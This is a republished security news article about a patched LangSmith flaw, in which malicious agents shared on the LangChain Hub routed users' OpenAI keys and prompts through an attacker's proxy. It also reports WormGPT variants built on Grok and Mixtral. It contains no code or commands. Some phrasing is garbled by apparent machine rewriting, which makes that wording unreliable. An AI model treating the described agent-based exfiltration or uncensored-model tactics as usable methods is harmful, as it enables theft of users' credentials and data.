Close Menu
  • Home
  • Identity
  • Inventions
  • Future
  • Science
  • Startups
  • Spanish
What's Hot

Too burnt out to travel? This new app will fake your summer vacation photos

Salesforce CEO Marc Benioff apologizes for saying San Francisco needs National Guard troops

Salesforce CEO Marc Benioff apologizes for saying San Francisco needs National Guard troops

Facebook X (Twitter) Instagram
  • Home
  • About Us
  • Advertise with Us
  • Contact Us
  • DMCA
  • Privacy Policy
  • Terms & Conditions
  • User-Submitted Posts
Facebook X (Twitter) Instagram
Fyself News
  • Home
  • Identity
  • Inventions
  • Future
  • Science
  • Startups
  • Spanish
Fyself News
Home » A bug in Langsmith could expose Openai keys and user data via malicious agents
Identity

A bug in Langsmith could expose Openai keys and user data via malicious agents

userBy userJune 17, 2025No Comments4 Mins Read
Share Facebook Twitter Pinterest Telegram LinkedIn Tumblr Email Copy Link
Follow Us
Google News Flipboard
Share
Facebook Twitter LinkedIn Pinterest Email Copy Link

June 17, 2025Ravi LakshmananVulnerability / LLM Security

Lang Chain Lang Smith Bug

Cybersecurity researchers have disclosed a now patched security flaw that can be used to capture sensitive data such as API keys and user prompts on Langchain’s Langsmith platform.

The vulnerability with a CVSS score of 8.8 out of a maximum of 10.0 is Agent Smith, codenamed by Noma Security.

Langsmith is an observability and assessment platform that allows users to develop, test and monitor large-scale language model (LLM) applications, including those built using Langchain. The service also offers what is called Langchain Hub. It acts as a repository for all published prompts, agents, and models.

“This newly identified vulnerability exploited unsuspecting users who employ agents that contain pre-configured malicious proxy servers uploaded to the ‘Prompt Hub’,” Sasi Levi and Gal Moyal said in a report shared with Hacker News.

Cybersecurity

“Once adopted, the malicious proxy carefully intercepted all user communications, including API keys (including Openai API keys), user prompts, documents, images, voice inputs, and other sensitive data, without the victim’s knowledge.”

The first phase of the attack essentially unfolds. Bad actors create artificial intelligence (AI) agents and configure them on model servers via proxy provider functionality. This allows you to test the prompts against any model that complies with the OpenAI API. The attacker then shares the agent on Langchain Hub.

The next step is to proceed by the user to find this malicious agent via Langchain Hub and provide a prompt as input to “try it out”. In doing so, all communication with the agent is secretly routed through the attacker’s proxy server, extracting data without the user’s knowledge.

The captured data includes the OpenAI API key, prompt data, and uploaded attachments. Threat actors weaponized the Openai API key to gain unauthorized access to the Openai environment of victims, with more serious consequences such as model theft and rapid leakage of the system.

Additionally, attackers can run out of all the organization’s API quotas, increase billing costs, and temporarily restrict access to Openai services.

That doesn’t end there. If a victim chooses to clone an agent into an enterprise environment, along with an embedded malicious proxy configuration, it will continuously leak valuable data to the attacker without indicating that traffic is being intercepted.

Following the responsible disclosure on October 29, 2024, a vulnerability was addressed in the Langchain backend as part of the fixes rolled out on November 6th. Additionally, the patch implements a warning prompt regarding data exposure when users try to clone an agent that contains a custom proxy configuration.

“Beyond the immediate risk of unexpected economic losses from unauthorized API use, malicious actors can gain permanent access to internal datasets uploaded to Openai, proprietary models, trade secrets and other intellectual property, resulting in damage to liability and reputation,” the researcher said.

The new wormmgpt variant is in detail

The disclosure comes as CATO network revealed that threat actors have released two previously unreported Wormgpt variants powered by Xai Grok and Mistral AI Mixtral.

Cybersecurity

Wormgpt was launched in mid-2023 as an uncensored generation AI tool designed to explicitly promote malicious activities in threat Activators, such as creating tailored phishing emails and creating malware snippets. The project was closed shortly after the author of the Tool was left out as a 23-year-old Portuguese programmer.

Since then, several new “wormmgpt” variants have been promoted in cybercrime forums like violation forms, such as Xzin0Vich-Wormgpt and Keanu-Wormgpt, designed to provide “uncensored responses to a wide range of topics,” even if they are “unethical or illegal.”

“Wormgpt is currently serving as a recognizable brand for a new class of uncensored LLM,” said security researcher Vitaly Simonovich.

“These new iterations of Wormgpt are not a bespoke model built from scratch, but the result of threat actors skillfully adapting existing LLMs. Potentially manipulating system prompts and fine-tune illegal data, authors provide a powerful AI-driven tool for Wormgpt-branded cybercriminal manipulation.”

Did you find this article interesting? Follow us on Twitter and LinkedIn to read exclusive content you post.

Source link

Follow on Google News Follow on Flipboard
Share. Facebook Twitter Pinterest LinkedIn Tumblr Email Copy Link
Previous ArticleLawyers say plea bargains are being pursued for Chinese scientists charged with toxic US fungi
Next Article A $16 billion worth of lamps in a peter ties founder fund-led deal
user
  • Website

Related Posts

New .NET CAPI backdoor targets Russian car and e-commerce companies via phishing ZIPs

October 18, 2025

Silver Fox spreads Winos 4.0 attack to Japan and Malaysia via HoldingHands RAT

October 18, 2025

Immortality is No Longer Science Fiction: TwinH’s AI Breakthrough Could Change Everything

October 17, 2025
Add A Comment
Leave A Reply Cancel Reply

Latest Posts

Too burnt out to travel? This new app will fake your summer vacation photos

Salesforce CEO Marc Benioff apologizes for saying San Francisco needs National Guard troops

Salesforce CEO Marc Benioff apologizes for saying San Francisco needs National Guard troops

WhatsApp changes terms to ban generic chatbots from platform

Trending Posts

Subscribe to News

Subscribe to our newsletter and never miss our latest news

Please enable JavaScript in your browser to complete this form.
Loading

Welcome to Fyself News, your go-to platform for the latest in tech, startups, inventions, sustainability, and fintech! We are a passionate team of enthusiasts committed to bringing you timely, insightful, and accurate information on the most pressing developments across these industries. Whether you’re an entrepreneur, investor, or just someone curious about the future of technology and innovation, Fyself News has something for you.

Immortality is No Longer Science Fiction: TwinH’s AI Breakthrough Could Change Everything

The AI Revolution: Beyond Superintelligence – TwinH Leads the Charge in Personalized, Secure Digital Identities

Revolutionize Your Workflow: TwinH Automates Tasks Without Your Presence

FySelf’s TwinH Unlocks 6 Vertical Ecosystems: Your Smart Digital Double for Every Aspect of Life

Facebook X (Twitter) Instagram Pinterest YouTube
  • Home
  • About Us
  • Advertise with Us
  • Contact Us
  • DMCA
  • Privacy Policy
  • Terms & Conditions
  • User-Submitted Posts
© 2025 news.fyself. Designed by by fyself.

Type above and press Enter to search. Press Esc to cancel.